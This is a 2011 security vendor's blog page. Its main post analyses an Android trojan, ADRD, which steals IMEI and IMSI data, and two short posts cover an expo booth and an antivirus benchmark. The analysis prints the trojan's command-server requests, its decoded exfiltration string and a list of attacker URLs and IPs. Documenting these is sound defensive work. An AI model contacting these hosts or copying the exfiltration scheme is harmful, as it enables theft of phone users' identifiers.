[ General ] 17 February, 2011 15:56

    We are located in Lionic booth (#2732), thank all the visitors stopped by our booth and gave us valuable feedback. Tomorrow will be the last day of the RSA 2011 Conference Expo, and we also run out of our materials, so please seize the chance to visit our booth and watch our demo in real Android phone & tablet.

   This is our first to setup booth in RSA Expo, everything is interesting and people are vigorous. It's really good for people who concern security!

 

 

[ Security Alert ] 14 February, 2011 20:38

     AegisLab is devoted in protecting the security of mobile users, we collect and analyaze the Android packages for two years.  Today, we found a new Android trojan, we call it "ADRD", which was not reported by any security vendors before.

    In our analysis, the malware writer repackaged(infected) legal apps, especially wallpapers that do not usually appear on apps panel, therefore users may rarely notice it. This trojan compromises personal data such as IMEI/IMSI of the device and sends them back to the remote side to react  based on the commands from there. The infected applications request extensive permissions like RECEIVE_BOOT_COMPLETED, ACCESS_NETWORK_STATE to be able to run in the background once the event occurs. It also schedules an alerm to wake itself up regularly. However, it's somewhat lower profile than 'GEINIMI' trojan found last year. Fewer messages/commands sent and less bandwidth consumed by this trojan. Users may not even notice it after weeks but still suffer data leakage and bandwidth consumption.


How it works:

    It registers several receivers to intercept events such as boot complete, net connectivity change, and etc. Then starts a service in the background once the event occurs. The service firstly connects back to the server via http with DES encoded string like

POST /index.aspx?im=6363ea04af859e4c5b839761a04e04f0b7d5868546a5471587b5db8848de8d7a2efc443455fa0839828c592920ddc1ec6ea1b3acf2b97d46 HTTP/1.1
HOST: adrd.taxuan.net

    After decoded, we have:

354059xxxxxxxxx&310260xxxxxxxxx&1&6&adrd.zt.cw.4

   

    It sends back IMEI/IMSI of the phone together with some version numbers of the trojan for the server to decide next step. Later the server responded a list of urls:

POST /pic.aspx?im=6363ea04af859e4c5b839761a04e04f0b7d5868546a54715a7786e2a0e5e894e HTTP/1.1
RESPONSE(decoded):
B#1#963a_w1|http://59.173.12.105/g/g.ashx?w=963a_w1|1|http://59.173.12.105/add/pk.aspx$B#1#961a_w1|http://59.173.12.105/g/g.ashx?w=961a_w1|1|http://59.173.12.105/add/pk.aspx$B#1#964a_w1|http://59.173.12.105/g/g.ashx?w=964a_w1|1|http://59.173.12.105/add/pk.aspx$B#1#881d_w1|http://59.173.12.105/g/g.ashx?w=881d_w1|1|http://59.173.12.105/add/pk.aspx$%3Cbr%20/%3EB#1#978a_w1|http://59.173.12.105/g/g.ashx?w=978a_w1|1|http://59.173.12.105/add/pk.aspx$B#1#979a_w1|http://59.173.12.105/g/g.ashx?w=979a_w1|1|http://59.173.12.105/add/pk.aspx$B#1#609b_w1|http://59.173.12.105/g/g.ashx?w=609b_w1|1|http://59.173.12.105/add/pk.aspx$B#1#1044a_w1|http://59.173.12.105/g/g.ashx?w=1044a_w1|1|http://59.173.12.105/add/pk.aspx$B#1#999a_w1|http://59.173.12.105/g/g.ashx?w=999a_w1|1|http://59.173.12.105/add/pk.aspx$B#1#999b_w1|http://59.173.12.105/g/g.ashx?w=999b_w1|1|http://59.173.12.105/add/pk.aspx$B#1#999c_w1|http://59.173.12.105/g/g.ashx?w=999c_w1|1|http://59.173.12.105/add/pk.aspx$B#1#1059a_w1|http://59.173.12.105/g/g.ashx?w=1059a_w1|1|http://59.173.12.105/add/pk.aspx$B#1#1060a_w1|http://59.173.12.105/g/g.ashx?w=1060a_w1|1|http://59.173.12.105/add/pk.aspx$B#1#1059b_w1|http://59.173.12.105/g/g.ashx?w=1059b_w1|1|http://59.173.12.105/add/pk.aspx$B#1#1086d_w1|http://59.173.12.105/g/g.ashx?w=1086d_w1|1|http://59.173.12.105/add/pk.aspx$B#1#1086e_w1|http://59.173.12.105/g/g.ashx?w=1086e_w1|1|http://59.173.12.105/add/pk.aspx$B#1#1086f_w1|http://59.173.12.105/g/g.ashx?w=1086f_w1|1|http://59.173.12.105/add/pk.aspx$B#1#1086g_w1|http://59.173.12.105/g/g.ashx?w=1086g_w1|1|http://59.173.12.105/add/pk.aspx$B#1#1086h_w1|http://59.173.12.105/g/g.ashx?w=1086h_w1|1|http://59.173.12.105/add/pk.aspx$B#1#1086r_w1|http://59.173.12.105/g/g.ashx?w=1086r_w1|1|http://59.173.12.105/add/pk.aspx$B#1#1086t_w1|http://59.173.12.105/g/g.ashx?w=1086t_w1|1|http://59.173.12.105/add/pk.aspx$B#1#1089b_w1|http://g.gxsmy.com/?w=1089b_w1|1|http://59.173.12.105/add/pk.aspx$B#1#1089c_w1|http://g.gxsmy.com/?w=1089c_w1|1|http://59.173.12.105/add/pk.asp%3Cbr%20/%3Ex$B#1#1089d_w1|http://g.gxsmy.com/?w=1089d_w1|1|http://59.173.12.105/add/pk.aspx$B#1#962a_w1|http://59.173.12.105/g/g.ashx?w=962a_w1|1|http://59.173.12.105/add/pk.aspx$B#1#768b_w1|http://59.173.12.105/g/g.ashx?w=768b_w1|1|http://59.173.12.105/add/pk.aspx$B#1#965a_w1|http://59.173.12.105/g/g.ashx?w=965a_w1|1|http://59.173.12.105/add/pk.aspx$B#1#780b_w1|http://59.173.12.105/g/g.ashx?w=780b_w1|1|http://59.173.12.105/add/pk.aspx$B#1#834b_w1|http://59.173.12.105/g/g.ashx?w=834b_w1|1|http://59.173.12.105/add/pk.aspx$B#1#959a_w1|http://59.173.12.105/g/g.ashx?w=959a_w1|1|http://59.173.12.105/add/pk.aspx$


    After few http requests sent back and forth, it gets a URL to connect in the background (in this case analyzed): http://wap.baidu.com/s?word=%e7%83%a8%e4%b9%8b%e5%9b%bd%e5%ba%a6&vit=uni&from=961a_w1

    The malware writer may benefit from the random link users connect, and users are sufferred by data disclosure as well as bandwidth consumption(higher net bill).

We suggest users:


    (1) Do not download and install applications from unknown/unofficial web site, only download from trusted source.
    (2) Remember to install mobile security applications like "AegisLab Antivirus Free" (Originally called AppScan Beta) and "AegisLab Antivirus Elite" tool and scan constantly. This trojan can be identified by these tools.

By AegisLab

[ Product News ] 10 February, 2011 12:46

   Today we update the detection rate comparison table: solutions extend to 9, samples extend to 70.
Tested solutions includes:

1. AegisLab : EgisMobile Anti-virus Security, Version 0.4.2
2. NetQin Mobile Inc. : Mobile Anti-virus, Version 4.6
3. Lookout, Inc. : Lookout Mobile Security, Version 5.3
4. 360Safe: 360 Mobile Safe, Version 1.7.2
5. Doctor Web, Ltd.: Dr. Web For Android Light Version 6.00.5
6. NortonMobile: Norton Mobile Security (Beta), Version 1.5.0.154
7. Trend Micro: Mobile Security, Version 1.2
8. DroidSecurity -AVG: Antivirus Free – AVG, Version 2.6
9. HAURI, Inc.: ViRobot Mobile ,Version 1.5.0.911

    The final test summary is:

     For people who may interest in test methodology and test samples used, please check our report (Android_Antivirus_Benchmark_2011_02_09.pdf).

     Beside this internal test, we are welcome for public test hold by any fair entity.

By Aegislab